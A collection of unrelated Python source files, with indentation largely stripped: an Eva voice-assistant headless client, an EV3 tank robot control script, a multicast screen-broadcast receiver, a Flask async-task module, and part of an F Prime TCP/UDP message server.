keyword-based activation through either pocketsphinx or
`snowboy <https://snowboy.kitt.ai/>`_ models.
.. warning::
This client is experimental and is currently under active development.
Requirements
++++++++++++
* Requires a working pyaudio installation (with portaudio)
``apt-get install portaudio19-dev``
``apt-get install python-pyaudio``
Or
``pip3 install pyaudio --user``
* Requires pocketsphinx, webrtcvad, respeaker
``apt-get install pocketsphinx``
``pip3 install pocketsphinx webrtcvad``
``pip3 install git+https://github.com/respeaker/respeaker_python_library.git``
* May also need PyUSB
``pip3 install pyusb``
* Requires pydub for converting mp3 and ogg to wav for playback
``pip3 install pydub``
See https://github.com/jiaaro/pydub for system dependencies.
``apt-get install ffmpeg libavcodec-ffmpeg-extra56``
Or
``brew install ffmpeg --with-libvorbis --with-ffplay --with-theora``
* Requires anypubsub
``pip3 install anypubsub --user``
* Requires pymongo
``apt-get install python3-pymongo``
Or
``pip3 install pymongo --user``
* Requires that Eva have the
`Audio Server <https://github.com/edouardpoitras/eva-audio-server>`_ plugin enabled
Optional
++++++++
You may optionally use `snowboy`_ for keyword
detection. To do so, you need to get the ``_snowboydetect.so`` binary for your
platform (the one found at ``clients/snowboy/_snowboydetect.so`` in this repo is
only for Python3 on Ubuntu).
You can get precompiled binaries and information on how to compile
`here <https://github.com/kitt-ai/snowboy#precompiled-binaries-with-python-demo>`_.
If you end up compiling, ensure you use swig >= 3.0.10 and use your platform's
Python3 command in the Makefile (default is just ``python``).
Once you've compiled snowboy (or downloaded the dependencies), put the
``_snowboydetect.so`` and ``snowboydetect.py`` files in the ``clients/snowboy/``
folder.
You can either get a keyword detection model on the snowboy
`website <https://snowboy.kitt.ai/>`_ or use the provided alexa one in this
repository.
Usage
+++++
``python3 clients/headless.py``
Or with a snowboy model:
``python3 clients/headless.py --snowboy-model=clients/snowboy/alexa.umdl``
"""
import os
import time
import socket
import argparse
from threading import Thread, Event
from multiprocessing import Process
from respeaker.microphone import Microphone
from pymongo import MongoClient
from anypubsub import create_pubsub_from_settings
from pydub import AudioSegment
from pydub.playback import play as pydub_play
# Check for Snowboy.
try:
import snowboy.snowboydecoder
except: #pylint: disable=W0702
print('WARNING: Could not import Snowboy decoder/model - falling back to Pocketsphinx')
# Arguments passed via command line.
ARGS = None
# The sound played when Eva recognizes the keyword for recording.
PING_FILE = os.path.abspath(os.path.dirname(__file__)) + '/resources/ping.wav'
PONG_FILE = os.path.abspath(os.path.dirname(__file__)) + '/resources/pong.wav'
# Pocketsphinx/respeaker configuration.
os.environ['POCKETSPHINX_DIC'] = os.path.abspath(os.path.dirname(__file__)) + '/dictionary.txt'
os.environ['POCKETSPHINX_KWS'] = os.path.abspath(os.path.dirname(__file__)) + '/keywords.txt'
class DummyDecoder(object): #pylint: disable=R0903
"""
Fake decoder in order to use respeaker's listen() method without setting
up a pocketsphinx decoder.
"""
def start_utt(self):
"""
Overloaded method that simply passes.
"""
pass
def listen(quit_event):
"""
Utilizes respeaker's Microphone object to listen for keyword and sends audio
data to Eva over the network once the keyword is heard.
Audio data will be sent for a maximum of 5 seconds and will stop sending
after 1 second of silence.
:param quit_event: A threading event object used to abort listening.
:type quit_event: :class:`threading.Event`
"""
global ARGS
global mic
if ARGS.snowboy_model:
mic = Microphone(quit_event=quit_event, decoder=DummyDecoder())
while not quit_event.is_set():
detector = snowboy.snowboydecoder.HotwordDetector(ARGS.snowboy_model, sensitivity=0.5)
detector.start(detected_callback=handle_command,
interrupt_check=quit_event.is_set,
sleep_time=0.03)
detector.terminate()
else:
mic = Microphone(quit_event=quit_event)
while not quit_event.is_set():
if mic.wakeup(ARGS.keyword):
handle_command()
def handle_command():
global mic
play(PING_FILE)
print('Listening...')
data = mic.listen(duration=5, timeout=1)
udp_stream(data)
print('Done')
play(PONG_FILE)
def play(filepath, content_type='audio/wav'):
"""
Will attempt to play various audio file types (wav, ogg, mp3).
"""
if 'wav' in content_type:
sound = AudioSegment.from_wav(filepath)
elif 'ogg' in content_type or 'opus' in content_type:
sound = AudioSegment.from_ogg(filepath)
elif 'mp3' in content_type or 'mpeg' in content_type:
sound = AudioSegment.from_mp3(filepath)
pydub_play(sound)
def udp_stream(data):
"""
Simple helper function to send a generator type object containing audio
data, over to Eva. Uses UDP as protocol.
:param data: Generator type object returned from
respeaker.microphone.Microphone.listen().
:type data: Generator
"""
global ARGS
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for d in data:
udp.sendto(d, (ARGS.eva_host, ARGS.audio_port))
udp.close()
def start_consumer(queue):
"""
Starts a consumer to listen for pubsub-style messages on the specified
queue. Will connect to a MongoDB server specified in the parameters.
Uses multiprocessing.Process for simplicity.
:param queue: The message queue to listen for messages on.
:type queue: string
"""
process = Process(target=consume_messages, args=(queue,))
process.start()
def get_pubsub():
"""
Helper function to get a anypubsub.MongoPubSub object based on parameters
specified by command line. Will tail the 'eva' database's 'communications'
collection for pubsub messages.
:return: The anypubsub object used for receiving Eva messages.
:rtype: anypubsub.backends.MongoPubSub
"""
global ARGS
    uri = 'mongodb://'
    if len(ARGS.mongo_username) > 0:
        uri = uri + ARGS.mongo_username
        if len(ARGS.mongo_password) > 0:
            uri = uri + ':' + ARGS.mongo_password
        uri = uri + '@'
    uri = '%s%s:%s' % (uri, ARGS.mongo_host, ARGS.mongo_port)
client = MongoClient(uri)
return create_pubsub_from_settings({'backend': 'mongodb',
'client': client,
'database': 'eva',
'collection': 'communications'})
def consume_messages(queue):
"""
The worker function that is spawned in the :func:`start_consumer` function.
Will do the work in listening for pubsub messages from Eva and playing
the audio responses.
:param queue: The pubsub message queue to subscribe to.
:type queue: string
"""
# Need to listen for messages and play audio ones to the user.
pubsub = get_pubsub()
subscriber = pubsub.subscribe(queue)
# Subscriber will continuously tail the mongodb collection queue.
for message in subscriber:
if message is not None:
if isinstance(message, dict) and \
'output_audio' in message and \
message['output_audio'] is not None:
audio_data = message['output_audio']['audio']
f = open('/tmp/eva_audio', 'wb')
f.write(audio_data)
f.close()
play('/tmp/eva_audio', message['output_audio']['content_type'])
time.sleep(0.1)
def main():
"""
Parses client configuration options, starts the consumers, and starts
listening for keyword.
The keyword specified needs to be configured in respeaker (the keyword must
be available in the pocketsphinx configuration for dictionary.txt and
keywords.txt).
"""
parser = argparse.ArgumentParser()
parser.add_argument("--keyword", help="Keyword to listen for - only works if configured in dictionary.txt and keywords.txt", default='eva')
parser.add_argument("--snowboy-model", help="Alternatively specify a Snowboy model instead of using Pocketsphinx for keyword detection")
parser.add_argument("--eva-host", help="Eva server hostname or IP", default='localhost')
parser.add_argument("--audio-port", help="Port that Eva is listening for Audio", default=8800)
parser.add_argument("--mongo-host", help="MongoDB hostname or IP (typically same as Eva)", default='localhost')
parser.add_argument("--mongo-port", help="MongoDB port", default=27017)
parser.add_argument("--mongo-username", help="MongoDB username", default='')
parser.add_argument("--mongo-password", help="MongoDB password", default='')
global ARGS
ARGS = parser.parse_args()
# Start the message consumers.
start_consumer('eva_messages')
start_consumer('eva_responses')
# Ready listening thread.
quit_event = Event()
thread = Thread(target=listen, args=(quit_event,))
thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
quit_event.set()
break
thread.join()
if __name__ == '__main__':
main()
|
04-tank-switchable.py
|
#!/usr/bin/env python3
# Functionality:
# IR channel 0: normal tank
# IR channel 1: fast tank
# IR channel 2: slow tank
# backspace -> exit
# down -> toggle color saying
# up -> follow the current color
import math
import logging
import threading
import signal
import time
import ev3dev.ev3 as ev3
import sys
from ev3dev.auto import OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev.helper import MediumMotor
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)5s: %(message)s')
log = logging.getLogger(__name__)
log.info("Starting TRACK3RWithPen")
silent = True
class Tank(object):
def __init__(self, left_motor, right_motor, polarity='inversed', name='Tank',
speed_sp=400):
self.left_motor = ev3.LargeMotor(left_motor)
self.right_motor = ev3.LargeMotor(right_motor)
for x in (self.left_motor, self.right_motor):
if not x.connected:
log.error("%s is not connected" % x)
sys.exit(1)
self.left_motor.reset()
self.right_motor.reset()
self.speed_sp = speed_sp
self.left_motor.speed_sp = self.speed_sp
self.right_motor.speed_sp = self.speed_sp
self.set_polarity(polarity)
self.name = name
log.info("Created Tank object "+name+" for speed "+str(self.speed_sp))
def __str__(self):
return self.name
def set_polarity(self, polarity):
valid_choices = ('normal', 'inversed')
assert polarity in valid_choices,\
"%s is an invalid polarity choice, must be %s" % (polarity, ', '.join(valid_choices))
self.left_motor.polarity = polarity
self.right_motor.polarity = polarity
class RemoteControlledTank(Tank):
def __init__(self, left_motor, right_motor, polarity='inversed', channel=1, speed_sp=400):
Tank.__init__(self, left_motor, right_motor, polarity, speed_sp=speed_sp)
log.info("Getting remote control for channel "+str(channel))
self.remote = ev3.RemoteControl(channel=channel)
if not self.remote.connected:
log.error("%s is not connected" % self.remote)
sys.exit(1)
self.remote.on_red_up = self.make_move(self.left_motor, self.speed_sp)
self.remote.on_red_down = self.make_move(self.left_motor, self.speed_sp * -1)
self.remote.on_blue_up = self.make_move(self.right_motor, self.speed_sp)
self.remote.on_blue_down = self.make_move(self.right_motor, self.speed_sp * -1)
def make_move(self, motor, dc_sp):
def move(state):
if state:
motor.run_forever(speed_sp=dc_sp)
else:
motor.stop()
return move
def process(self):
self.remote.process()
def main(self, done):
try:
while not done.is_set():
self.remote.process()
time.sleep(0.01)
# Exit cleanly so that all motors are stopped
except (KeyboardInterrupt, Exception) as e:
log.exception(e)
for motor in ev3.list_motors():
motor.stop()
class TRACK3R(RemoteControlledTank):
"""
Base class for all TRACK3R variations. The only difference in the child
classes are in how the medium motor is handled.
To enable the medium motor toggle the beacon button on the EV3 remote.
"""
def __init__(self, medium_motor, left_motor, right_motor, speed_sp=400, channel=1):
RemoteControlledTank.__init__(self, left_motor, right_motor, speed_sp=speed_sp, channel=channel)
self.medium_motor = MediumMotor(medium_motor)
if not self.medium_motor.connected:
log.error("%s is not connected" % self.medium_motor)
sys.exit(1)
self.medium_motor.reset()
class TRACK3RWithPen(TRACK3R):
def __init__(self, medium_motor=OUTPUT_A, left_motor=OUTPUT_B, right_motor=OUTPUT_C, speed_sp=400, channel=1):
TRACK3R.__init__(self, medium_motor, left_motor, right_motor, speed_sp=speed_sp, channel=channel)
self.remote.on_beacon = self.move_pen
self.pen_down = True
def move_pen(self, state):
print("Current pen state:", self.pen_down)
if self.pen_down:
self.medium_motor.run_to_rel_pos(speed_sp=200, position_sp=-75, stop_action="hold")
else:
self.medium_motor.run_to_rel_pos(speed_sp=200, position_sp=75, stop_action="hold")
self.pen_down = not self.pen_down
def touch_leds(done):
"""
This is the second thread of execution. It will constantly poll the
touch button and change leds
"""
ts = ev3.TouchSensor()
while not done.is_set():
ev3.Leds.set_color(ev3.Leds.LEFT, (ev3.Leds.GREEN, ev3.Leds.RED)[ts.value()])
def play_leds():
from ev3dev.ev3 import Leds
# save current state
saved_state = [led.brightness_pct for led in Leds.LEFT + Leds.RIGHT]
Leds.all_off()
time.sleep(0.1)
# continuous mix of colors
print('colors fade')
for i in range(180):
rd = math.radians(10 * i)
Leds.red_left.brightness_pct = .5 * (1 + math.cos(rd))
Leds.green_left.brightness_pct = .5 * (1 + math.sin(rd))
Leds.red_right.brightness_pct = .5 * (1 + math.sin(rd))
Leds.green_right.brightness_pct = .5 * (1 + math.cos(rd))
time.sleep(0.05)
Leds.all_off()
time.sleep(0.5)
    for led, level in zip(Leds.LEFT + Leds.RIGHT, saved_state):
led.brightness_pct = level
def toggle_event(evt):
if evt.is_set():
log.info("toggling off")
evt.clear()
else:
log.info("toggling on")
evt.set()
def button_watcher(done):
"""
This will respond to buttons pressed
"""
bt = ev3.Button()
log.info("Configuring buttons:")
# the horrifying lambda-if-not-x-else-true runs play_leds upon button release
    bt.on_up = lambda x: play_leds() if not x else True
log.info(" up: play_leds")
bt.on_backspace = lambda x: done.set() if not x else True
log.info(" esc: exit")
bt.on_down = lambda x: toggle_event(color_speaker_on) if not x else True
# toggle operation of color speaker
log.info(" down: speak colors")
while not done.is_set():
bt.process()
time.sleep(0.5)
def color_speaker(done, color_speaker_on):
"""
This will poll color and say its name if changed.
"""
while not done.is_set():
log.info("color_speaker ready")
color_speaker_on.wait() # wait until someone launches us
log.info("color_speaker starting")
cl = ev3.ColorSensor()
assert cl.connected, "Connect a color sensor to any sensor port"
cl.mode='COL-COLOR'
colors=('unknown','black','blue','green','yellow','red','white','brown')
lastcolor=0
while color_speaker_on.is_set() and not done.is_set():
thiscolor = cl.value()
if thiscolor != lastcolor:
lastcolor = thiscolor
if thiscolor:
print(colors[thiscolor])
ev3.Sound.speak("This is "+colors[thiscolor]+".").wait()
time.sleep(0.5)
log.info("color_speaker stopping")
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# global switches
color_speaker_on = threading.Event()
# We also need to catch SIGINT (keyboard interrup) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
trackerBasic = TRACK3RWithPen()
trackerFast = TRACK3RWithPen(channel=2, speed_sp=800)
trackerSlow = TRACK3RWithPen(channel=3, speed_sp=200)
# Now that we have the worker functions defined, lets run those in separate
# threads.
#touchthread = threading.Thread(target=touch_leds, args=(done,))
colorthread = threading.Thread(target=color_speaker, args=(done, color_speaker_on))
buttonthread = threading.Thread(target=button_watcher, args=(done,))
#touchthread.start()
colorthread.start()
buttonthread.start()
log.info("Started TRACK3RWithPen")
if not silent: ev3.Sound.speak("I'm ready!")
#trackerBasic.main(done)
# our custom loop processing all speeds:
try:
while not done.is_set():
trackerBasic.process()
trackerFast.process()
trackerSlow.process()
time.sleep(0.01)
# Exit cleanly so that all motors are stopped
except (KeyboardInterrupt, Exception) as e:
log.exception(e)
done.set()
for motor in ev3.list_motors():
motor.stop()
# hopefully it will be sufficient to start one
if not silent: ev3.Sound.speak("Exiting!")
log.info("Exiting TRACK3RWithPen")
# release all threads to let them stop
color_speaker_on.set()
done.set()
#touchthread.join()
colorthread.join()
buttonthread.join()
|
ScreenBroadcast.py
|
from PyQt5.QtCore import QObject
from PyQt5.QtGui import QImage, QPixmap
from Module.Packages import ScreenBroadcastFlag
import socket
import struct
import zlib
from threading import Thread, Lock
from queue import Queue
import logging
class ScreenBroadcast(QObject):
def __init__(self, parent, current_ip, socket_ip, socket_port, socket_buffer):
super(ScreenBroadcast, self).__init__()
self.parent = parent
self.current_ip = current_ip
self.socket_ip = socket_ip
self.socket_port = socket_port
self.socket_buffer = socket_buffer
self.frames_queue = Queue()
self.working = False
self.__init_socket_obj()
def __init_socket_obj(self):
self.socket_obj = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.socket_obj.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
self.socket_obj.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket_obj.bind(('', self.socket_port))
self.socket_obj.setsockopt(
socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.socket_ip) + socket.inet_aton(self.current_ip)
)
def __recieve_thread(self):
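        # Assumed wire format (inferred from the struct calls below, not from an
        # external spec): each frame starts with a 16-byte '!4i' info packet
        # (flag, frame index, compressed length, rounds), followed by '!2i' data
        # packets carrying (flag, payload length, payload). Payloads are
        # concatenated and zlib-decompressed into a single image frame.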
header_size = struct.calcsize('!4i')
payload_size = self.socket_buffer - struct.calcsize('!2i')
frame_data = b''
pack_drop_flag = False
pack_drop_buffer = b''
while self.working:
try:
if not pack_drop_flag:
socket_data, _ = self.socket_obj.recvfrom(header_size)
else:
socket_data = pack_drop_buffer
pack_drop_flag = False
pack_drop_buffer = b''
data_flag, data_index, data_length, data_rounds = struct.unpack('!4i', socket_data)
if data_flag == ScreenBroadcastFlag.PackInfo:
while len(frame_data) < data_length:
socket_data, _ = self.socket_obj.recvfrom(self.socket_buffer)
data_flag, pack_length, pack = struct.unpack(f'!2i{payload_size}s', socket_data)
pack = pack[:pack_length]
if data_flag == ScreenBroadcastFlag.PackData:
frame_data += pack
elif data_flag == ScreenBroadcastFlag.PackInfo:
pack_drop_flag = True
pack_drop_buffer = socket_data
break
if pack_drop_flag:
continue
elif len(frame_data) == data_length:
frame = zlib.decompress(frame_data)
self.frames_queue.put(frame)
frame_data = b''
elif len(frame_data) > data_length:
frame_data = b''
except (OSError, struct.error):
continue
except Exception as e:
logging.warning(f'Failed to handle frame: {e}')
    def start(self):
        self.working = True
        Thread(target=self.__recieve_thread, daemon=True).start()
while self.working:
frame_raw = self.frames_queue.get()
frame_qimage = QImage.fromData(frame_raw)
self.parent.frame_recieved.emit(QPixmap.fromImage(frame_qimage))
|
tasks.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 Miguel Grinberg <miguelgrinberg50@gmail.com>
#
# Distributed under terms of the MIT license.
import threading
import time
import uuid
from datetime import datetime
from flask import current_app, request
from flask_restful import Resource
from functools import wraps
tasks = {}
def before_first_request():
def clean_old_tasks():
global tasks
while True:
# Only keep tasks that are running or that finished less than 5 minutes ago.
five_min_ago = datetime.timestamp(datetime.utcnow()) - 5 * 60
tasks = {
task_id: task
for task_id, task in tasks.items()
if 'timestamp' not in task or task['timestamp'] > five_min_ago
}
time.sleep(60)
thread = threading.Thread(target=clean_old_tasks)
thread.start()
def async_api(f):
@wraps(f)
def wrapped(*args, **kwargs):
def task(flask_app, environ):
# Create a request context similar to that of the original request
with flask_app.request_context(environ):
try:
tasks[task_id]['response'] = f(*args, **kwargs)
except Exception as e:
tasks[task_id]['response'] = {
'err': 'Task failed',
'msg': str(e)
}, 500
if current_app.debug:
raise e
finally:
tasks[task_id]['timestamp'] = datetime.timestamp(datetime.utcnow())
task_id = uuid.uuid4().hex
tasks[task_id] = {
'task': threading.Thread(
target=task,
args=(current_app._get_current_object(), request.environ)
)
}
tasks[task_id]['task'].start()
# Return a 202 response, with a link that the client can use to obtain task status
return {'msg': 'Task started', 'task_id': task_id}, 202
return wrapped
class TaskResource(Resource):
def get(self, task_id):
"""
Return status about an asynchronous task. If this request returns a 202
status code, it means that task hasn't finished yet. Else, the response
from the task is returned.
"""
task = tasks.get(task_id)
if task is None:
return {'err': 'Task not found'}, 404
if 'response' not in task:
return {'msg': 'Task is still running'}, 202
return task['response']
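# Illustrative wiring sketch (an assumption, not part of this module): async_api
# decorates a slow Resource method, and TaskResource exposes task status.
#
#   from flask import Flask
#   from flask_restful import Api
#
#   app = Flask(__name__)
#   api = Api(app)
#
#   class SlowJob(Resource):
#       @async_api
#       def post(self):
#           time.sleep(10)              # long-running work
#           return {'msg': 'finished'}
#
#   api.add_resource(SlowJob, '/jobs')
#   api.add_resource(TaskResource, '/tasks/<string:task_id>')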
|
tcpserver.py
|
#!/usr/bin/env python3
import errno
import os
import signal
import socket
import struct
import sys
import threading
import time
from optparse import OptionParser
from fprime.constants import DATA_ENCODING
try:
import socketserver
except ImportError:
import SocketServer as socketserver
__version__ = 0.1
__date__ = "2015-04-03"
__updated__ = "2016-04-07"
# Universal server id global
SERVER = None
LOCK = None
shutdown_event = threading.Event()
FSW_clients = []
GUI_clients = []
FSW_ids = []
GUI_ids = []
def signal_handler(*_):
print("Ctrl-C received, server shutting down.")
shutdown_event.set()
def now():
return time.ctime(time.time())
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py application.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.StreamRequestHandler.allow_reuse_address = True
socketserver.StreamRequestHandler.timeout = 1
def handle(self): # on each client connect
"""
The function that is invoked upon a new client. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.partial = b""
self.cmdQueue = []
self.registered = False
self.name = b""
self.id = 0
# print self.client_address, now() # show this client's address
# Read the data from the socket
data = self.recv(13)
# Connection was closed by the client
if not data:
print("Client exited.")
return
else:
# Process the data into the cmdQueue
self.getCmds(data)
# Process the cmdQueue
self.processQueue()
if self.registered:
print("Registration complete waiting for message.")
self.getNewMsg()
else:
print("Unable to register client.")
return
LOCK.acquire()
del SERVER.dest_obj[self.name]
if self.name in FSW_clients:
FSW_clients.remove(self.name)
FSW_ids.remove(self.id)
elif self.name in GUI_clients:
GUI_clients.remove(self.name)
GUI_ids.remove(self.id)
LOCK.release()
print("Closed %s connection." % self.name.decode(DATA_ENCODING))
self.registered = False
self.request.close()
def getCmds(self, inputString, end_of_command=b"\n"):
"""
Build a command from partial or full socket input
"""
commands = inputString.split(end_of_command)
if len(self.partial):
commands[0] = self.partial + commands[0]
self.partial = b""
if len(commands[-1]):
self.partial = commands[-1]
self.cmdQueue.extend(commands[:-1])
else:
self.cmdQueue.extend(commands[:-1])
def processQueue(self):
for cmd in self.cmdQueue:
self.processRegistration(cmd)
self.cmdQueue = []
def processRegistration(self, cmd):
params = cmd.split()
process_id = 0
if params[0] == b"Register":
LOCK.acquire()
name = params[1]
if b"FSW" in name:
if FSW_clients:
process_id = sorted(FSW_ids)[-1] + 1
name = params[1] + b"_" + bytes(process_id)
FSW_clients.append(name)
FSW_ids.append(process_id)
elif b"GUI" in name:
if GUI_clients:
process_id = sorted(GUI_ids)[-1] + 1
name = params[1] + b"_" + bytes(process_id)
GUI_clients.append(name)
GUI_ids.append(process_id)
SERVER.dest_obj[name] = DestObj(name, self.request)
LOCK.release()
self.registered = True
self.name = name
self.id = process_id
print("Registered client " + self.name.decode(DATA_ENCODING))
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Loop while the connected client has packets to send/receive
while not shutdown_event.is_set():
# Read the header data from the socket either A5A5 or List
header = self.readHeader()
# If the received header is an empty string, connection closed, exit loop
if not header:
break
elif header == b"Quit":
LOCK.acquire()
print("Quit received!")
SERVER.dest_obj[self.name].put(struct.pack(">I", 0xA5A5A5A5))
shutdown_event.set()
time.sleep(1)
print("Quit processed!")
SERVER.shutdown()
SERVER.server_close()
LOCK.release()
break
# Got the header data so read the data of the message here...
data = self.readData(header)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def recv(self, l):
"""
Read l bytes from socket.
"""
chunk = b""
msg = b""
n = 0
while l > n:
try:
chunk = self.request.recv(l - n)
if chunk == b"":
print("read data from socket is empty!")
return b""
msg = msg + chunk
n = len(msg)
except socket.timeout:
if shutdown_event.is_set():
print("socket timed out and shutdown is requested")
return b"Quit\n"
continue
except OSError as err:
if err.errno == errno.ECONNRESET:
print(
"Socket error "
+ str(err.errno)
+ " (Connection reset by peer) occurred on recv()."
)
else:
print("Socket error " + str(err.errno) + " occurred on recv().")
return msg
def readHeader(self):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = self.recv(5)
if len(header) == 0:
print(
"Header information is empty, client "
+ self.name.decode(DATA_ENCODING)
+ " exiting."
)
return header
if header == b"List\n":
return b"List"
elif header == b"Quit\n":
return b"Quit"
elif header[:-1] == b"A5A5":
header2 = self.recv(4)
return header + header2
else:
return
def readData(self, header):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = b""
if header == b"List":
return b""
elif header == b"Quit":
return b""
dst = header.split(b" ")[1].strip(b" ")
if dst == b"FSW":
# Read variable length command data here...
desc = self.recv(4)
sizeb = self.recv(4)
size = struct.unpack(">I", sizeb)[0]
data = desc + sizeb + self.recv(size)
elif dst == b"GUI":
# Read telemetry data here...
tlm_packet_size = self.recv(4)
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + self.recv(size)
else:
raise RuntimeError("unrecognized client %s" % dst.decode(DATA_ENCODING))
return data
def processNewPkt(self, header, data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
        Once the entire header string is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
if header == b"List":
print("List of registered clients: ")
LOCK.acquire()
for d in list(SERVER.dest_obj.keys()):
print("\t" + SERVER.dest_obj[d].name.decode(DATA_ENCODING))
reg_client_str = b"List " + SERVER.dest_obj[d].name
l = len(reg_client_str)
reg_client_str = struct.pack("i%ds" % l, l, reg_client_str)
self.request.send(reg_client_str)
LOCK.release()
return 0
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b"A5A5": # Packet Header
# print "Received Packet: %s %s...\n" % (head,dst)
if data == b"":
print(" Data is empty, returning.")
if b"GUI" in dst:
dest_list = GUI_clients
elif b"FSW" in dst:
dest_list = FSW_clients
for dest_elem in dest_list:
# print "Locking TCP"
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
# print "Sending TCP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Packet missing A5A5 header")
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py application.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.BaseRequestHandler.allow_reuse_address = True
def handle(self): # on each packet
"""
The function that is invoked when a packet is received. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.getNewMsg(self.request[0])
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self, packet):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Read the header data from the socket either A5A5 or List
(header, packet) = self.readHeader(packet)
# If the received header is an empty string, connection closed, exit loop
if not header:
return
# Got the header data so read the data of the message here...
data = self.readData(header, packet)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def readHeader(self, packet):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = packet[:4]
header2 = packet[4:9]
packet = packet[9:]
return (header + header2, packet)
def readData(self, header, packet):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = ""
header.split(b" ")[1].strip(b" ")
# Read telemetry data here...
tlm_packet_size = packet[:4]
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + packet[4 : 4 + size]
return data
def processNewPkt(self, header, data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
Once the entire header string is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b"A5A5": # Packet Header
# print "Received Packet: %s %s...\n" % (head,dst)
if data == "":
print(" Data is empty, returning.")
if b"GUI" in dst:
dest_list = GUI_clients
else:
print("dest? %s" % dst.decode(DATA_ENCODING))
for dest_elem in dest_list:
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
# print "Sending UDP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Telemetry missing A5A5 header")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""
TCP Socket server.
Keep a dictionary of destination objects containing queues and
socket id's for writing to destinations.
"""
dest_obj = dict()
lock_obj = threading.Lock()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""
UDP Socket server.
"""
class DestObj:
"""
Destination object for all clients registered.
"""
def __init__(self, name, request):
"""
Constructor
"""
self.name = name
self.socket = request
self.packet = b""
def put(self, msg):
"""
Write out the message to the destination socket
"""
try:
# print "about to send data to " + self.name
self.socket.send(msg)
except OSError as err:
print("Socket error " + str(err.errno) + " occurred on send().")
def fileno(self):
""""""
return self.socket
def main(argv=None):
global SERVER, LOCK
program_name = os.path.basename(sys.argv[0])
program_license = "Copyright 2015 user_name (California Institute of Technology) \
ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged."
program_version = "v0.1"
program_build_date = "%s" % __updated__
program_version_string = "%prog {} ({})".format(program_version, program_build_date)
program_longdesc = (
"""""" # optional - give further explanation about what the program does
)
if argv is None:
argv = sys.argv[1:]
try:
parser = OptionParser(
version=program_version_string,
epilog=program_longdesc,
description=program_license,
)
parser.add_option(
"-p",
"--port",
dest="port",
action="store",
type="int",
help="Set threaded tcp socket server port [default: %default]",
default=50007,
)
parser.add_option(
"-i",
"--host",
dest="host",
action="store",
type="string",
help="Set threaded tcp socket server ip [default: %default]",
default="127.0.0.1",
)
# process options
(opts, args) = parser.parse_args(argv)
HOST = opts.host
PORT = opts.port
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
udp_server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
# Hopefully this will allow address reuse and server to restart immediately
server.allow_reuse_address = True
SERVER = server
LOCK = server.lock_obj
print("TCP Socket Server listening on host addr {}, port {}".format(HOST, PORT))
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
udp_server_thread = threading.Thread(target=udp_server.serve_forever)
signal.signal(signal.SIGINT, signal_handler)
server_thread.daemon = False
server_thread.start()
udp_server_thread.daemon = False
udp_server_thread.start()
while not shutdown_event.is_set():
server_thread.join(timeout=5.0)
